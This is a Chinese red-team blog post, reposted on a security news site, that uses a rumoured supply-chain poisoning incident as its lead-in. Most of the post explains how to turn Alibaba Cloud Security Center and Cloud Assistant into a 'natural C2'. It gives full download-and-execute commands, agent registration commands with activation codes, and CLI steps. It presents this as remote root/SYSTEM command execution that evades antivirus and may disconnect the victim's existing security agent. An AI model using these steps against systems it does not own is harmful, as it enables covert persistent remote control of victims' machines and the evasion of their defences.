破案!安骑士天然C2?——网传某友供应链投毒事件分析

admin 2023年8月20日23:19:36评论138 views字数 2816阅读9分23秒阅读模式

免责声明

本公众号致力于安全研究和红队攻防技术分享等内容,本文中所有涉及的内容均不针对任何厂商或个人,同时由于传播、利用本公众号所发布的技术或工具造成的任何直接或者间接的后果及损失,均由使用者本人承担。请遵守中华人民共和国相关法律法规,切勿利用本公众号发布的技术或工具从事违法犯罪活动。最后,文中提及的图文若无意间导致了侵权问题,请在公众号后台私信联系作者,进行删除操作。

0x01
背景

笔者一边刷着微步一边嗦着螺丝粉,突然小队群里跳出一串转发信息,“用友被打了吗,官网补丁可能是供应链投毒?”

破案!安骑士天然C2?——网传某友供应链投毒事件分析

破案!安骑士天然C2?——网传某友供应链投毒事件分析

破案!安骑士天然C2?——网传某友供应链投毒事件分析

老丁:一眼假,F12一按开始编故事是吧

零神:我觉得很可能啊,说是样本里面是安骑士的安装包,还有安装方法。

破案!安骑士天然C2?——网传某友供应链投毒事件分析

机智的我大脑飞速的旋转,一想事情不简单,安骑士怎么就上线了。紧接着辟谣信息就来了。

破案!安骑士天然C2?——网传某友供应链投毒事件分析

但是安骑士上线这绝活我怎么可能不会?

破案!安骑士天然C2?——网传某友供应链投毒事件分析

0x02
阿里云SAAS化安骑士

云安全中心是一个实时识别、分析、预警安全威胁的服务器主机安全管理系统,通过防勒索、漏洞扫描修复、防病毒、防篡改、合规检查等安全能力,帮助用户实现威胁检测、响应、溯源的自动化安全运营闭环,保护云上主机、本地服务器和容器安全,并满足监管合规要求,简化来说类似于edr。

天然C2

在攻防角度上,云安全中心可以给我们提供一个自带阿里云证书以及可信域名的一个远控形式,我称之为天然C2。

接入流程

官方文档描述的安装命令在

云安全管理中心->系统配置->功能设置->客户端

破案!安骑士天然C2?——网传某友供应链投毒事件分析

该链接适用于单个云主机,如果想要批量安装agent可通过新增安装命令,生成镜像去批量安装

破案!安骑士天然C2?——网传某友供应链投毒事件分析

破案!安骑士天然C2?——网传某友供应链投毒事件分析

填写具体的信息会生成一个链接。

主要差异为注册码,也就相当于agent匹配注册码->接入云安全中心

安装方法

在linux中操作,通过命令可直接安装agent

wget "https://aegis.alicdn.com/download/install/2.0/linux/AliAqsInstall.sh" && chmod +x AliAqsInstall.sh && ./AliAqsInstall.sh  -k=xxx

安装过程中会自动卸载老的agent(这个设定是不是能直接让原来的安全中心断连)

破案!安骑士天然C2?——网传某友供应链投毒事件分析

安装完成后可以看到云安全中心中多了一台机器

破案!安骑士天然C2?——网传某友供应链投毒事件分析

接下来我们可以对该机器进行运维

破案!安骑士天然C2?——网传某友供应链投毒事件分析

进入运维监控,如果未安装云助手需要安装云助手,点击一键安装即可,云助手为阿里云原生打造的自动化运维工具,下面会详细描述。

安装完云助手可查看到我们的实例

破案!安骑士天然C2?——网传某友供应链投毒事件分析

可以进行远程登陆(普通用户权限)

破案!安骑士天然C2?——网传某友供应链投毒事件分析

也可以远程执行命令(root权限)

破案!安骑士天然C2?——网传某友供应链投毒事件分析

0x04
阿里云助手实战

云助手概述

云助手是专为云服务器ECS打造的原生自动化运维工具,通过免密码、免登录、无需使用跳板机的形式,在ECS实例上实现批量运维、执行命令(Shell、PowerShell、Bat等)和发送文件等操作。典型的使用场景包括:安装卸载软件、启动或停止服务、分发配置文件和执行一般的命令(或脚本)等。

版本限制

Alibaba Cloud LinuxCentOS 6/7/8及更高版本CoreOSDebian 8/9/10及更高版本OpenSUSERedHat 5/6/7及更高版本SUSE Linux Enterprise Server 11/12/15及更高版本Ubuntu 12/14/16/18及更高版本Window Server 2012/2016/2019及更高

云助手实战

由于阿里云在云助手中添加了针对混合云的场景的解决方案,所以当服务器不属于官方ecs时也可以加入云助手,于是我们获得了一个集Linux和windows于一体的天然官方远控C2,而且不用考虑免杀等情况,下面会演示一些对于windows和linux通用场景下的创建注册云助手。

  • 比起常规C2的缺点

1、无法通过其他技术手段隐藏自己(只有使用匿名阿里云账号),容易被溯源。

2、文件上传限制大小,无法上传大于32kb的文件。

  • 注册码的生成形式

1、最简单的方式是通过网页版的ecs云助手直接创建注册码

2、使用官方cli生成注册码

  • Windows场景实战

通过云助手生成注册码

破案!安骑士天然C2?——网传某友供应链投毒事件分析

下载云助手exe,自带阿里云签名,可免杀。

破案!安骑士天然C2?——网传某友供应链投毒事件分析

在windows机器中以管理员身份运行注册的exe

aliyun_agent_latest_setup.exe /S --register --RegionId="cn-hangzhou" --ActivationCode="a-hz0vqv4hEnQGAfw6F55CzX1TmyXO/" --ActivationId="E5473BA4-8B44-5B1A-B190-74F251794619"

破案!安骑士天然C2?——网传某友供应链投毒事件分析

云助手注册成功,可直接命令执行

破案!安骑士天然C2?——网传某友供应链投毒事件分析

自带提权至system

破案!安骑士天然C2?——网传某友供应链投毒事件分析

  • Linux较通用场景

为什么叫较通用场景?

注册码快捷命令的本质是安装云助手,然后通过云助手去注册服务,有时候在严苛的linux环境中无法去进行rpm,deb安装或者是没有wget等命令,于是翻遍了手册得到了一个较为通用的办法。

破案!安骑士天然C2?——网传某友供应链投毒事件分析

安装云助手

1、使用binary安装方式

公网地址(最新版本):

x86版本

wget "https://aliyun-client-assist.oss-accelerate.aliyuncs.com/linux/aliyun_assist_latest_update.zip"




arm版本

wget "https://aliyun-client-assist.oss-accelerate.aliyuncs.com/arm/aliyun_assist_latest_update_arm.zip"

(tips:如果没有wget可直接上传压缩包)

破案!安骑士天然C2?——网传某友供应链投毒事件分析

2、解压并安装

unzip -o aliyun_assist_latest_update.zip  -d /usr/local/share/aliyun-assist/chmod a+x /usr/local/share/aliyun-assist/2.2.3.282/update_installbash /usr/local/share/aliyun-assist/2.2.3.349/update_install

破案!安骑士天然C2?——网传某友供应链投毒事件分析

3、使用官方cli创建注册码

aliyun ecs CreateActivation --RegionId "cn-shanghai" --TimeToLiveInHours 24

破案!安骑士天然C2?——网传某友供应链投毒事件分析

4、使用云助手注册激活码

sudo aliyun-service --register --RegionId "cn-shanghai"     --ActivationCode "a-sh0vqeO2FYTtJtRJEFd/l6+RJpE+P"     --ActivationId "F5E679CB-716D-5BCC-8A49-34342A3C144D"

破案!安骑士天然C2?——网传某友供应链投毒事件分析

5、成功上线

破案!安骑士天然C2?——网传某友供应链投毒事件分析

0x05
总结

总结个毛线,还在炫零食是吧,真想当一辈子猴子?把下面小密圈给我加起来,赶紧给我去学,我螺蛳粉都凉透了,tnnd

原文始发于微信公众号(Lambda小队):破案!安骑士天然C2?——网传某友供应链投毒事件分析

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年8月20日23:19:36
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   破案!安骑士天然C2?——网传某友供应链投毒事件分析https://cn-sec.com/archives/1958229.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息